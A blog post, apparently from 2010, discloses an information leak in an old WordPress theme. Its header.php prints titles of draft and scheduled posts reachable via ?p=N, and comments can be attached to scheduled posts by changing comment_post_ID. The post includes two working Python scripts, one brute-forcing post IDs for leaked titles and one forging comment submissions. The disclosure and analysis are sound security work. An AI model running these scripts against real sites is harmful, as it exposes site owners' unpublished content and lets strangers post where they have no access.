tmacuk

UPDATE: WordPress Bug 2.9.1 – Title BruteForce

by tmac on Feb.07, 2010, under Hacks

So last night I received a call from ethicalhack3r saying that the bug I had found should work on any blog, because the default ?p= permalinks are still available even if you have chosen a different permalink structure. So what we were looking for was ?p= followed by a post ID that pointed to a post that wasn't published.

He then wrote a script that brute-forces the post IDs so we could find them on any site. Not only did this turn up all the drafts I had at the time, but also the posts I thought I had deleted. The posts that had been deleted and never shown, i.e. drafts, could be seen by a member of the forum. Future (scheduled) posts, however, could not be seen, but their titles could.

We started to run this script against other people's blogs to see if it worked for them, and it didn't. So we came to the conclusion that something was wrong with my blog. I removed all my plug-ins and got ethicalhack3r to try again, and it still worked. So I was getting really frustrated that it was something I had done.

I then checked my theme and realised there was an update. So I updated, and it still worked! ethicalhack3r then made a test blog using the scripts available through our host and installed the latest version of my theme. There it didn't work. We came to the conclusion that it must be the theme, but why did it work on my site and not on the test blog?

We compared source code and found the following -

<title><?php if (is_home () ) { bloginfo('name'); echo " - "; bloginfo('description');
} elseif (is_category() ) {single_cat_title(); echo " - "; bloginfo('name');
} elseif (is_single() || is_page() ) {single_post_title(); echo " - "; bloginfo('name');
} elseif (is_search() ) {bloginfo('name'); echo " search results: "; echo wp_specialchars($s);
} else { wp_title('',true); }?></title>

More specifically we were looking for this -

} else { wp_title('',true); }

This else branch is reached for any request that is not a home, category, single post, page or search view, which is where a request for an unpublished post ends up, and all it does is print whatever title wp_title() returns for the queried post inside the <title> tags, even though the post itself is not shown. This can be found in the theme's header.php.
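The script ethicalhack3r wrote is not reproduced in this post, so here is an added example (my own code, not his, the theme's or WordPress's) of the same idea, covering both the brute-force script mentioned above and the else branch just shown: walk ?p=N over a range of post IDs, pull the <title> out of each response, and flag the IDs where the page is a 404 but the title tag still carries a post title, which is what that branch produces for an unpublished post. It assumes that WordPress answers an anonymous request for a draft, scheduled, trashed or non-existent post with a 404 status; the blog at http://blog.example and its responses are constructed so the scan runs offline, and a real URL, ID range and blog name on the command line runs it live.

```python
import re
import sys
from html import unescape
from typing import Callable, Dict, List, Tuple
from urllib.error import HTTPError
from urllib.request import urlopen

# A fetcher maps a URL to (HTTP status, response body).
Fetcher = Callable[[str], Tuple[int, str]]

TITLE_RE = re.compile(r"<title>(.*?)</title>", re.IGNORECASE | re.DOTALL)


def extract_title(html: str) -> str:
    """Text of the first <title> element, entities decoded, or '' if absent."""
    match = TITLE_RE.search(html)
    return unescape(match.group(1)).strip() if match else ""


def http_fetch(url: str) -> Tuple[int, str]:
    """Live fetcher. urllib raises on 4xx/5xx, so keep the error body too."""
    try:
        with urlopen(url, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def classify(status: int, html: str, blog_name: str) -> Tuple[str, str]:
    """Bucket one ?p=N response as published, leaked or empty.

    Assumption: an anonymous request for a draft, scheduled, trashed or
    non-existent post gets a 404 page.  A clean theme gives that page a
    generic title; the vulnerable else branch (wp_title('',true)) gives it
    the hidden post's own title, which is the leak we are looking for.
    """
    title = extract_title(html)
    if status == 200:
        return "published", title
    lowered = title.lower()
    generic = {"", blog_name.lower(), "page not found", "not found"}
    if lowered in generic or lowered.startswith(blog_name.lower() + " - "):
        return "empty", title
    return "leaked", title


def scan(base_url: str, first: int, last: int, blog_name: str,
         fetch: Fetcher = http_fetch) -> Dict[str, List[Tuple[int, str]]]:
    """Try every post id in first..last and return the three buckets."""
    results: Dict[str, List[Tuple[int, str]]] = {"published": [], "leaked": [], "empty": []}
    base = base_url.rstrip("/")
    for pid in range(first, last + 1):
        status, body = fetch(f"{base}/?p={pid}")
        kind, title = classify(status, body, blog_name)
        results[kind].append((pid, title))
    return results


# Constructed responses standing in for a vulnerable blog (not captured data).
SAMPLE_RESPONSES: Dict[str, Tuple[int, str]] = {
    "http://blog.example/?p=1": (200, "<html><head><title>Hello world! - Example Blog</title></head>"
                                      "<body><div class='post'>First post</div></body></html>"),
    "http://blog.example/?p=2": (404, "<html><head><title></title></head><body>Not Found</body></html>"),
    "http://blog.example/?p=3": (404, "<html><head><title>Draft: Q3 layoffs announcement</title></head>"
                                      "<body></body></html>"),
    "http://blog.example/?p=4": (404, "<html><head><title>Example Blog</title></head><body>Not Found</body></html>"),
}


def fake_fetch(url: str) -> Tuple[int, str]:
    """Offline fetcher over SAMPLE_RESPONSES; unknown ids look like a clean 404."""
    return SAMPLE_RESPONSES.get(url, (404, "<html><head><title></title></head></html>"))


def demo() -> Dict[str, List[Tuple[int, str]]]:
    """Run the scanner against the constructed blog."""
    return scan("http://blog.example", 1, 5, "Example Blog", fetch=fake_fetch)


if __name__ == "__main__":
    if len(sys.argv) == 5:  # python title_bruteforce.py http://host 1 500 "Blog Name"
        out = scan(sys.argv[1], int(sys.argv[2]), int(sys.argv[3]), sys.argv[4])
    else:
        out = demo()
    for pid, title in out["leaked"]:
        print(f"leaked  ?p={pid}  {title!r}")
    for pid, title in out["published"]:
        print(f"public  ?p={pid}  {title!r}")
```

Against the constructed blog, ?p=3 is reported as leaked: the page is a 404, yet its title tag names a draft. The only thing the classifier relies on is the difference between the title of a normal 404 page and the title of a post that should not be visible, so the generic-title set is the part to adjust for a theme whose 404 page is titled differently.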

We then went to the website the theme came from looking for a changelog, but couldn't find one; the author hadn't kept one. So all I know is that I was running > version 1.9.9.

A clean install of the theme would fix this, but the update doesn't change this part of the code. After a few Google searches we found that a lot of people were still using the old version of the theme and were vulnerable to the attack I had found.

Another interesting thing is that you can post a comment on a future (scheduled) post. I currently have two comments sitting on a post scheduled for 01/01/2011: the first from ethicalhack3r saying "Muhahahaha", and the second from Tom Sellers, who works on Nmap, saying "Test post to Marty McFly."

This is how it is done -

Open any of your blog posts. Save a copy of the HTML document to local disk. Open that file with an editor and replace all instances of the post id (mine was copied from post 122, http://tmacuk.co.uk/?p=122) with the post id of the future post, in your case 153. It shows up in a few formats (p=122, value="122, value='122) so just find and replace the number.

Save the document and then open it. Enter a comment and post it. It should show up on your future post, McFly ;) The captcha is a full link to the captcha service so it's live and works, BONUS!
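The find-and-replace above can be scripted, and doing so makes clear what the server is actually accepting. The following is an added example (my own code, not from the post, from Tom Sellers or from WordPress): retarget_comment_form() rewrites a saved post page so every ?p=122, value="122" and value='122' points at the new post ID while leaving unrelated numbers such as 1220 alone, and build_comment_post() builds the equivalent POST to wp-comments-post.php directly, since the hidden comment_post_ID field is the only thing tying a comment to a post. It assumes the field names of the WordPress 2.9 default comment form (author, email, url, comment, comment_post_ID, comment_parent); the sample page is constructed, and if the target runs a captcha plugin, as this blog did, the direct POST would also have to carry that plugin's fields.

```python
import re
from typing import Tuple
from urllib.parse import urlencode
from urllib.request import Request, urlopen

# Every place a saved post page carries the post id: ?p=122 in permalinks and
# value="122" / value='122' on the hidden comment_post_ID input.  The trailing
# \b stops 122 from matching inside 1220.
ID_RE = re.compile(r"(\?p=|value=[\"'])(\d+)\b")


def retarget_comment_form(html: str, old_id: int, new_id: int) -> str:
    """Rewrite a saved post page so its comment form targets another post id."""
    def swap(match):
        found = match.group(2)
        if int(found) == old_id:
            found = str(new_id)
        return match.group(1) + found
    return ID_RE.sub(swap, html)


def build_comment_post(site: str, post_id: int, author: str, email: str,
                       comment: str) -> Tuple[str, bytes]:
    """Same request without editing any HTML: the comment form is a plain POST
    to wp-comments-post.php and comment_post_ID is a field the client chooses.
    Field names are those of the WordPress 2.9 default form (assumed); a
    captcha plugin adds fields of its own, which would have to be copied too."""
    fields = {
        "author": author,
        "email": email,
        "url": "",
        "comment": comment,
        "comment_post_ID": str(post_id),
        "comment_parent": "0",
    }
    return f"{site.rstrip('/')}/wp-comments-post.php", urlencode(fields).encode()


def submit_comment(site: str, post_id: int, author: str, email: str, comment: str) -> int:
    """Send the POST built above and return the HTTP status (live; not run offline)."""
    url, body = build_comment_post(site, post_id, author, email, comment)
    req = Request(url, data=body, headers={
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"{site.rstrip('/')}/?p={post_id}",
    })
    with urlopen(req, timeout=10) as resp:
        return resp.status


# Constructed stand-in for a saved post page (not a capture from any site).
SAMPLE_PAGE = """<html><head><title>Some post - Example Blog</title></head><body>
<a href="http://blog.example/?p=122" rel="bookmark">Some post</a>
<form action="http://blog.example/wp-comments-post.php" method="post" id="commentform">
<input type="text" name="author" id="author" value="" />
<textarea name="comment" id="comment"></textarea>
<input name="submit" type="submit" id="submit" value="Submit Comment" />
<input type='hidden' name='comment_post_ID' value='122' />
<input type="hidden" name="comment_parent" id="comment_parent" value="0" />
</form>
<a href="http://blog.example/?p=1220">An unrelated post with id 1220</a>
</body></html>"""


def demo() -> str:
    """Retarget the constructed page from post 122 to the scheduled post 153."""
    return retarget_comment_form(SAMPLE_PAGE, 122, 153)
```

Opening the rewritten page in a browser and submitting the form is exactly the manual procedure; build_comment_post() shows that the browser step is optional, because nothing in the request proves the post was ever visible to the commenter.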

So if you wanted to know why I have changed my theme, there you go. I am guessing you can still comment on that post now, but you wouldn't be able to find it, because the bug no longer exists on my site.

So the bug went a lot deeper than I first thought. I must thank ethicalhack3r and Tom Sellers for their help last night; if it weren't for them this post would probably have taken a week to get out, and I would probably still be using the same buggy theme.

Here is a link to the theme: http://wordpress.org/extend/themes/pixel. Remember that a clean install will not produce the bug, so if you want to try it out, you need to edit header.php to the code I have talked about today.
